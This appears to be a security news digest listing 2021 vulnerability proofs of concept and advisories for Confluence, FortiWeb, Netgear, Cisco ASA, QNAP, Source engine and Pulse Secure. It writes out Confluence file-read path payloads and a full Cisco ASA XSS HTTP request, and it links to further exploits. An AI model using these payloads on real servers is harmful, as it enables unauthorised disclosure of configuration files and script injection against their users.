POCs for Atlassian Confluence Server Arbitrary File Read:
1) ;/WEB-INF/web.xml
2) ;/WEB-INF/classes/seraph-config.xml
3) ;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties
4) ;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml
https://github.com/ColdFusionX/CVE-2021-26085


Fortinet FortiWeb OS Command Injection PoC. The patch will be released at the end of August. https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/

ThroughTek "Kalay" Network Device Impersonation Vulnerability Proof of Concept. The vulnerability affects millions of IoT devices.

NETGEAR is aware of a security issue on some models of ProSAFE Gigabit Smart Managed Switches that can let an attacker permanently modify certain system variables. This vulnerability occurs when a remote attacker uses SNMP to access stored XSS on the web management interface. The only system variables that can be accessed and modified because of this vulnerability are system name, system location, and system contact. No other settings are vulnerable, and no network traffic or credentials are exposed. This vulnerability affects the following products: GS724Tv3 and GS716Tv2 with firmware version or earlier GS510TP with firmware version or earlier GS108Tv2 and GS110TP with

Stored XSS in Netgear ProSAFE GS724Tv3 and GS716Tv2 with firmware version or earlier GS510TP with firmware version or earlier GS108Tv2 and GS110TP with firmware version or earlier GS748Tv4 with firmware version or earlier. POC can be found here: (https://cyberant.com/en/knowledge-base-item/cve-2016-7941-xss-in-netgear-prosafe-switches/)

Cisco Adaptive Security Appliance (ASA) XSS POC:

    POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1
    Host: ciscoASA.local
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 44

    SAMLResponse="><svg/onload=alert('PTSwarm')>

QNAP NAS HBS 3 Hybrid Backup Sync Hard-Coded Credentials. QLocker Ransomware is using this vulnerability to encrypt files of QNAP customers. https://forum.qnap.com/viewtopic.php?t=160876&p=787015

Write-up of CVE-2021-30481: Source engine remote code execution via game invites. https://secret.club/2021/04/20/source-engine-rce-invite.html

Pulse Connect Secure remote code execution through authentication bypass. The CVSS v3.1 risk score is 10/10. The vulnerability has been exploited in the wild by the threat actor UNC2630. According to FireEye, UNC2630 may have ties with APT5 and the Chinese government. https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html